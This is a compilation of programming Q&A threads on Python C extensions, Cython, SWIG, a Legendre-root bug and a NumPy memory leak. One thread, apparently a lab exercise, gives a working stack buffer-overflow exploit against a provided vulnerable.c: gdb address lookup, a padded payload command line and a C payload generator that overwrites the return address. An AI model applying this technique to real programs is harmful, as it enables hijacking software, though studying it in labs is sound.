Equivalent of python lambda function for C (Python Extensions)

I've written a Python extension module in C to speed up computation times. The first step is a 2D integration of a function f(x,y,k), which is very fast and lets me integrate over y in [y1(x),y2(x)] and x in [a,b] while assigning a float to k. But I really need to integrate k over the range [c,d]. Currently, I'm doing something like this in Python:
inner = lambda k: calc.kernel(l,k,ki)
I = quad(inner,c,d)[0]
where calc is my C extension module and calc.kernel calls gauss2 to perform the 2D integration; l and ki are just other variables. But with my data, quad still takes many hours to finish. I would like to do all the calculations inside the C extension module, but I'm stumped on how to implement this outer integral. Here is my C code:
#include <Python.h>
#include <math.h>
double A96[96]={ /* abscissas for 96-point Gauss quadrature */
};
double W96[96]={ /* weights for 96-point Gauss quadrature */
};
double Y1(double x){
    return 0;
}
double Y2(double x){
    return x;
}
double gauss1(double F(double), double a, double b)
{   /* 96-pt Gauss quadrature integrates F(x) from a to b */
    int i;
    double cx, dx, q;
    cx = (a+b)/2;
    dx = (b-a)/2;
    q = 0;
    for (i = 0; i < 48; i++)
        q += W96[i]*(F(cx-dx*A96[i]) + F(cx+dx*A96[i]));
    return q*dx;
}
double gauss2(double F(double,double,int,double,double), double Y1(double), double Y2(double),
              double a, double b, int l, double k, double ki)
{   /* 96x96-pt 2-D Gauss quadrature integrates
       F(x,y) from y=Y1(x) to Y2(x) and x=a to b */
    int i, j, h;
    double cx, cy, dx, dy, q, w, x, y1, y2;
    cx = (a+b)/2;
    dx = (b-a)/2;
    q = 0;
    for (i = 0; i < 48; i++)
    {
        for (h = -1; h <= 1; h += 2)
        {
            x = cx + h*dx*A96[i];
            y1 = Y1(x);
            y2 = Y2(x);
            cy = (y1+y2)/2;
            dy = (y2-y1)/2;
            w = dy*W96[i];
            for (j = 0; j < 48; j++)
                q += w*W96[j]*(F(x, cy-dy*A96[j], l, k, ki) + F(x, cy+dy*A96[j], l, k, ki));
        }
    }
    return q*dx;
}
double ps_fact(double z){
    double M = 0.3;
    /* 3.0/2, not 3/2: integer division would truncate the prefactor to 1 */
    return 3.0/2*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))
           *(M*(1+z)*(1+z)*(1+z) + (1-M))/(1+z)/(1+z);
}
double drdz(double z){
    double M = 0.3;
    return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double rInt(double z){
    double M = 0.3;
    return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double kernel_func(double y, double x, int l, double k, double ki){
    /* caution: jn() takes an int order, so l+0.5 is truncated to l here;
       a fractional-order Bessel routine would be needed for order l+1/2 */
    return ps_fact(y)*ki*rInt(x)*sqrt(M_PI/2/rInt(x))*jn(l+0.5, ki*rInt(x))*drdz(x)
           *(rInt(x)-rInt(y))/rInt(y)*sqrt(M_PI/2/rInt(y))*jn(l+0.5, k*rInt(y))*drdz(y);
}
static PyObject* calc(PyObject* self, PyObject* args)
{
    int l;
    double k, ki;
    if (!PyArg_ParseTuple(args, "idd", &l, &k, &ki))
        return NULL;
    double res;
    res = gauss2(kernel_func, Y1, Y2, 0, 10, l, k, ki);
    return Py_BuildValue("d", res);
}
static PyMethodDef CalcMethods[] = {
    {"kernel", calc, METH_VARARGS, "Calculates kernel values."},
    {NULL, NULL, 0, NULL}
};
PyMODINIT_FUNC initcalc(void){
    (void) Py_InitModule("calc", CalcMethods);
}
A96 and W96 contain the abscissas and weights for the 96-point Gaussian quadrature, so don't worry that they are empty here. I should add that I take no credit for the functions gauss1 and gauss2.
EDIT: the Python code was wrong; it's fixed now.

Maybe the source code for scipy.integrate.quad is a good place to start, if you haven't looked there already: https://github.com/scipy/scipy/blob/v0.17.0/scipy/integrate/quadpack.py#L45-L360
It looks like most of the work is already being done by native Fortran code, which is normally as fast as or faster than C/C++ code. You will be hard pressed to improve on that, unless you create or find a CUDA implementation.
You could make the Fortran code multithreaded, if it isn't already and the source is open. Lastly, you could write a threading dispatcher in C/Fortran (CPython doesn't run Python bytecode in parallel because of the GIL) and at least make your calls to quad run in parallel with one another. Interfacing calc directly with the Fortran quad routines would probably save you some decent overhead too.
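Short of rewriting around QUADPACK, the outer integral over k can also be folded into the extension itself. Since C has no closures (the lambda the title asks about), one common workaround is to freeze the extra parameters in file-scope variables and hand gauss1 a plain wrapper function. A minimal sketch along those lines, reusing gauss1/gauss2 from the question (outer_l, outer_ki, calc_full and the "iddd" argument list are illustrative names, not from the original post):
/* Sketch only: emulate the Python lambda with file-scope state. */
static int    outer_l;   /* multipole fixed for the current call */
static double outer_ki;  /* ki fixed for the current call        */

static double outer_integrand(double k)
{   /* the "lambda": gauss2 with everything except k held fixed */
    return gauss2(kernel_func, Y1, Y2, 0, 10, outer_l, k, outer_ki);
}

static PyObject* calc_full(PyObject* self, PyObject* args)
{   /* full triple integral: k from c to d around the 2-D rule */
    int l;
    double ki, c, d;
    if (!PyArg_ParseTuple(args, "iddd", &l, &ki, &c, &d))
        return NULL;
    outer_l = l;
    outer_ki = ki;
    return Py_BuildValue("d", gauss1(outer_integrand, c, d));
}
Registered in CalcMethods next to kernel, this still costs 96 gauss2 evaluations per call, but it removes the per-point Python-call overhead that quad incurs; note that the file-scope variables make the module non-reentrant, so it is not thread-safe as sketched.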

Related

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit a program that has a buffer overflow vulnerability in order to get at a secret stored in a locked .txt file (printed by read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
    FILE *fptr = fopen("/task2/secret.txt", "r");
    char secret[1024];
    fscanf(fptr, "%512s", secret);
    printf("Well done!\nThere you go, a wee reward: %s\n", secret);
    exit(0);
}
int fib(int n)
{
    if (n == 0)
        return 0;
    else if (n == 1)
        return 1;
    else
        return fib(n-1) + fib(n-2);
}
void vuln(char *name)
{
    int n = 20;
    char buf[1024];
    int f[n];
    int i;
    for (i = 0; i < n; i++) {
        f[i] = fib(i);
    }
    strcpy(buf, name);
    printf("Welcome %s!\n", buf);
    for (i = 0; i < 20; i++) {
        printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
    }
}
int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Tell me your names, tricksy hobbitses!\n");
        return 0;
    }
    // printf("main function at %p\n", main);
    // printf("read_secret function at %p\n", read_secret);
    vuln(argv[1]);
    return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that vuln returns into read_secret instead of back to main.
But I'm pretty stuck here. I know I have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I have to replace the saved return address (which points back into main()) with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you can get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved return address (EIP, which tells the program what to execute next) and then substitute your own target address.
To do that you need the address of the function, so open your program in gdb and type:
x read_secret
Then copy the address. You then have to convert it to little-endian (or big-endian, depending on the target) byte order. I do it with the struct module in Python:
import struct
struct.pack("<I", address)  # "<I" packs a 32-bit little-endian value; big endian would use ">I"
Then you have to append it to your input to the binary, something like (on the bash shell, not in the script):
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
If all of this doesn't work, just add a few more characters to your offset. There might be something you didn't see coming:
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"
Hope that answers your question.
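For what it's worth, the same payload can be generated by a small C helper instead of the python one-liner. A sketch, assuming a 32-bit x86 target, the 1026-byte offset from above, and a made-up placeholder address 0x080484b6 that you must replace with the one gdb reports:
/* Hypothetical payload generator: 1026 filler bytes, then the 4-byte
   address of read_secret. 0x080484b6 is a placeholder; on a little-endian
   build host, memcpy of the uint yields little-endian bytes like "<I". */
#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned int addr = 0x080484b6;             /* placeholder: take from gdb */
    char payload[1026 + sizeof addr];
    memset(payload, 'a', 1026);                 /* filler up to the saved return address */
    memcpy(payload + 1026, &addr, sizeof addr); /* overwrites the saved EIP */
    fwrite(payload, 1, sizeof payload, stdout);
    return 0;
}
Compiled to, say, genpayload, it would be used the same way as the one-liner: /task2/vuln "$(./genpayload)".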

set cython cdef extension array to zero

Is there a Cythonic way to set a cdef array to zeros? I have a function with the following signature:
cdef cget_values(double[:] cpc_x, double[:] cpc_y):
The function is called as follows:
cdef double cpc_x [16]
cdef double cpc_y [16]
cget_values(cpc_x, cpc_y)
Now the first thing I would like to do is set everything in these arrays to zeros. Currently, I am doing that with a for loop as:
for i in range(16):
    cpc_x[i] = 0.0
    cpc_y[i] = 0.0
I was wondering if this is a reasonable approach without much overhead. I call this function a lot and was wondering if there is a more elegant/faster way to do this in cython.
I assume you are already using @cython.boundscheck(False), so there is not much you can do to improve on it performance-wise.
For readability reasons I would use:
cpc_x[:] = 0.0
cpc_y[:] = 0.0
Cython translates this into for loops. An additional advantage: even if @cython.boundscheck(False) isn't used, the resulting C code will nonetheless be free of bounds checks (__Pyx_RaiseBufferIndexError). Here is the resulting code for a[:] = 0.0:
{
    double __pyx_temp_scalar = 0.0;
    {
        Py_ssize_t __pyx_temp_extent_0 = __pyx_v_a.shape[0];
        Py_ssize_t __pyx_temp_stride_0 = __pyx_v_a.strides[0];
        char *__pyx_temp_pointer_0;
        Py_ssize_t __pyx_temp_idx_0;
        __pyx_temp_pointer_0 = __pyx_v_a.data;
        for (__pyx_temp_idx_0 = 0; __pyx_temp_idx_0 < __pyx_temp_extent_0; __pyx_temp_idx_0++) {
            *((double *) __pyx_temp_pointer_0) = __pyx_temp_scalar;
            __pyx_temp_pointer_0 += __pyx_temp_stride_0;
        }
    }
}
What could improve performance is to declare the memory views as contiguous (i.e. double[::1] instead of double[:]). The resulting C code for a[:] = 0.0 would then be:
{
    double __pyx_temp_scalar = 0.0;
    {
        Py_ssize_t __pyx_temp_extent = __pyx_v_a.shape[0];
        Py_ssize_t __pyx_temp_idx;
        double *__pyx_temp_pointer = (double *) __pyx_v_a.data;
        for (__pyx_temp_idx = 0; __pyx_temp_idx < __pyx_temp_extent; __pyx_temp_idx++) {
            *((double *) __pyx_temp_pointer) = __pyx_temp_scalar;
            __pyx_temp_pointer += 1;
        }
    }
}
As one can see, strides[0] is no longer used in the contiguous version: strides[0] == 1 is known at compile time, so the resulting C code can be better optimized (see for example here).
One could be tempted to get smart and use the low-level memset function:
from libc.string cimport memset
memset(&cpc_x[0], 0, 16*sizeof(double))
However, for bigger arrays there will be no difference compared to using a contiguous memory view (i.e. double[::1], see here for example). There might be less overhead for smaller sizes, but I never cared enough to check.

SWIG c++ vector access in python

This may be a noob question, but here it goes. I have wrapped a 3D vector in a Python module using SWIG. Everything compiles, and I can import the module and perform actions with it. But I can't figure out how to access the vector from Python to store and change its values. My code is below; it was written to test whether the STL <algorithm> functions work with SWIG. They do seem to work, but I need to be able to put values into the vector from Python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct{
    int vecd1, vecd2, vecd3;
    vector<vector<vector<double> > > vec3d;
    void vecSizer();
    void deleteDuplicates();
    double vecSize();
    void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
    vec3d.resize(vecd1);
    for(int i = 0; i < vec3d.size(); i++)
    {
        vec3d[i].resize(vecd2);
        for(int j = 0; j < vec3d[i].size(); j++)
        {
            vec3d[i][j].resize(vecd3);
        }
    }
}
void myStruct::deleteDuplicates()
{
    vector<vector<vector<double> > >::iterator it;
    sort(vec3d.begin(), vec3d.end());
    it = unique(vec3d.begin(), vec3d.end());
    vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
    return vec3d.size();
}
void myStruct::run()
{
    vecSizer();
    deleteDuplicates();
    vecSize();
}
from the terminal (Ubuntu):
>>> import test          # import the SWIG-generated module
>>> x = test.myStruct()  # create an instance of myStruct
>>> x.vecSize()          # should be 0 since the vector dimensions are not initialized
0.0
>>> x.vec3d              # see if vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!
It turns out that the vectors are converted to immutable Python objects when the wrapper/interface is generated this way, so in short you cannot modify the wrapped C++ vectors from Python.

Roots of Legendre Polynomials c++

I'm writing a program to find the roots of nth-order Legendre polynomials using C++; my code is attached below:
double* legRoots(int n)
{
    double myRoots[n];
    double x, dx, Pi = atan2(1,1)*4;
    int iters = 0;
    double tolerance = 1e-20;
    double error = 10*tolerance;
    int maxIterations = 1000;
    for(int i = 1; i <= n; i++)
    {
        x = cos(Pi*(i-.25)/(n+.5));
        do
        {
            dx -= legDir(n,x)/legDif(n,x);
            x += dx;
            iters += 1;
            error = abs(dx);
        } while (error > tolerance && iters < maxIterations);
        myRoots[i-1] = x;
    }
    return myRoots;
}
Assume the existence of working Legendre polynomial and Legendre polynomial derivative functions; I do have them, but I thought including them would make for an unreadable wall of code. This function runs, in the sense that it returns an array of calculated values, but the values are wildly off, outputting the following:
3.95253e-323
6.94492e-310
6.95268e-310
6.42285e-323
4.94066e-323
2.07355e-317
where an equivalent function I've written in Python gives the following:
[-0.90617985 -0.54064082 0. 0.54064082 0.90617985]
I was hoping another set of eyes could help me see what the issue in my C++ code is that's causing the values to be wildly off. I'm not doing anything different in my Python code than I am in C++, so any help anyone could give on this is greatly appreciated, thanks. For reference, I'm mostly trying to emulate the method found on Rosetta Code for Gaussian quadrature: http://rosettacode.org/wiki/Numerical_integration/Gauss-Legendre_Quadrature.
You are returning the address of a temporary variable that lives on the stack:
{
    double myRoots[n];
    ...
    return myRoots; // Not a safe thing to do
}
I suggest changing your function definition to
void legRoots(int n, double *myRoots)
omitting the return statement, and defining myRoots before calling the function:
double myRoots[10];
legRoots(10, myRoots);
Option 2 would be to allocate myRoots dynamically with new or malloc. (Separately, note that dx is read before it is ever assigned, and dx -= ... accumulates into it; the Newton step was presumably meant to be dx = -legDir(n,x)/legDif(n,x) on each iteration, so the values will stay off even after the return is fixed.)
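For completeness, a minimal sketch of option 2, assuming the caller takes ownership of the buffer and frees it:
#include <stdlib.h>

double* legRoots(int n)
{
    /* heap allocation survives the return, unlike the stack array */
    double *myRoots = malloc(n * sizeof *myRoots);
    if (myRoots == NULL)
        return NULL;                /* allocation failed */
    /* ... fill myRoots[0..n-1] with the Newton iteration as before ... */
    return myRoots;                 /* caller must free(myRoots) when done */
}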

Memory leak in Python extension when array is created with PyArray_SimpleNewFromData() and returned

I wrote a simple Python extension module to simulate a 3-bit analog-to-digital converter. It is supposed to accept a floating-point array as input and return an array of the same size, containing the quantized input values. Here is my (simplified) module:
static PyObject *adc3(PyObject *self, PyObject *args) {
    PyArrayObject *inArray = NULL, *outArray = NULL;
    double *pinp = NULL, *pout = NULL;
    npy_intp nelem, i;
    npy_intp dims[1];  /* PyArray_SimpleNewFromData expects npy_intp dims */
    /* Get arguments: */
    if (!PyArg_ParseTuple(args, "O:adc3", &inArray))
        return NULL;
    nelem = PyArray_DIM(inArray, 0); /* size of the input array */
    pout = (double *) malloc(nelem*sizeof(double));
    pinp = (double *) PyArray_DATA(inArray);
    /* ADC action */
    for (i = 0; i < nelem; i++) {
        if (pinp[i] >= -0.5) {
            if (pinp[i] < 0.5) pout[i] = 0;
            else if (pinp[i] < 1.5) pout[i] = 1;
            else if (pinp[i] < 2.5) pout[i] = 2;
            else if (pinp[i] < 3.5) pout[i] = 3;
            else pout[i] = 4;
        }
        else {
            if (pinp[i] >= -1.5) pout[i] = -1;
            else if (pinp[i] >= -2.5) pout[i] = -2;
            else if (pinp[i] >= -3.5) pout[i] = -3;
            else pout[i] = -4;
        }
    }
    dims[0] = nelem;
    outArray = (PyArrayObject *)
        PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
    //Py_INCREF(outArray);
    return PyArray_Return(outArray);
}
/* ==== methods table ====================== */
static PyMethodDef mwa_methods[] = {
    {"adc3", adc3, METH_VARARGS, "n-bit Analog-to-Digital Converter (ADC)"},
    {NULL, NULL, 0, NULL}
};
/* ==== Initialize ====================== */
PyMODINIT_FUNC initmwa() {
    Py_InitModule("mwa", mwa_methods);
    import_array(); // for NumPy
}
I expected that if reference counts were handled correctly, Python's garbage collection would (frequently enough) release the memory used by the output array when the same name is reused repeatedly. So I tested it on some dummy (but voluminous) data with this code:
for i in xrange(200):
    a = rand(1000000)
    b = mwa.adc3(a)
    print i
Here the array named "b" is reused many times and its memory, borrowed by adc3() from the heap, is expected to be returned to the system. I used the gnome-system-monitor to check. Contrary to my expectations, the memory owned by python grew rapidly and could only be released by quitting the program (I use IPython).
For comparison, I tried the same procedure with the standard NumPy functions, zeros() and copy():
for i in xrange(1000):
    a = np.zeros(10000000)
    b = np.copy(a)
    print i
As you can see, the latter code does not cause any memory build-up.
I read many texts in the standard documentation and on the web, tried to use Py_INCREF(outArray) and not to use it. All in vain: the problem persisted.
However, I found the solution in http://wiki.scipy.org/Cookbook/C_Extensions/NumPy_arrays.
The author provides an extension program matsq() that creates an array and returns it. When I tried to use the calls suggested by the author:
outArray = (PyArrayObject *) PyArray_FromDims(nd,dims,NPY_DOUBLE);
pout = (double *) outArray->data;
instead of my
pout = (double *) malloc(nelem*sizeof(double));
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
/* no matter with or without Py_INCREF(outArray) */
the memory leak was gone! The program works properly now.
A question: can anybody explain why PyArray_SimpleNewFromData() does not provide the correct reference counting, while PyArray_FromDims() does?
Thank you very much.
ADDITION. I probably exceeded the room/time in the comments, so I am adding to my comment to Alex here.
I tried to set the OWNDATA flag this way:
outArray->flags |= OWNDATA;
but I got "error: ‘OWNDATA’ undeclared".
The rest is in the comment. Thank you in advance.
SOLVED: The correct setting of the flag is
outArray->flags |= NPY_ARRAY_OWNDATA;
Now it works.
Alex, sorry.
The problem is not with PyArray_SimpleNewFromData, which produces a properly refcounted PyObject*. Rather, it's with your malloc, assigned to pout and then never freed.
As the docs at http://docs.scipy.org/doc/numpy/user/c-info.how-to-extend.html clearly state, documenting PyArray_SimpleNewFromData:
the ndarray will not own its data. When this ndarray is
deallocated, the pointer will not be freed.
...
If you want the
memory to be freed as soon as the ndarray is deallocated then simply
set the OWNDATA flag on the returned ndarray.
(my emphasis on the not). IOW, you're observing exactly the "will not be freed" behavior so clearly documented, and are not taking the step specifically recommended should you want to avoid said behavior.
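To make that concrete, here is a minimal sketch of the corrected tail of adc3(), keeping the malloc but handing ownership to the ndarray. I am assuming NumPy >= 1.7 for the PyArray_ENABLEFLAGS accessor, and that the buffer came from an allocator NumPy's deallocator can release (historically plain free()), which malloc satisfies:
npy_intp dims[1];
dims[0] = nelem;                   /* PyArray_SimpleNewFromData wants npy_intp dims */
outArray = (PyArrayObject *)
    PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
if (outArray == NULL) {
    free(pout);                    /* array creation failed: clean up ourselves */
    return NULL;
}
PyArray_ENABLEFLAGS(outArray, NPY_ARRAY_OWNDATA);  /* free pout when the array dies */
return PyArray_Return(outArray);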
